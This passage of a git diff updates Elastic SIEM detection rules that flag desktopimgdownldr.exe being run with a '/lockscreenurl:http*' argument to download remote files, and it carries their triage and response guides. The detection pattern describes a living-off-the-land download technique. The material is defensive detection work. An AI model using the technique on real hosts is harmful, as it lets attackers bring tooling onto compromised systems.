utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", "references": [ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_107.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_107.json index 365d63d5c70..027b465ca98 100644 --- a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_107.json +++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Desktopimgdownldr Utility", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", "references": [ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_108.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_108.json index 9e60992b092..b1a2301a0f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_108.json +++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Desktopimgdownldr Utility", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", "references": [ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_109.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_109.json new file mode 100644 index 00000000000..0ad9b7b40fa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_109.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via Desktopimgdownldr Utility", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 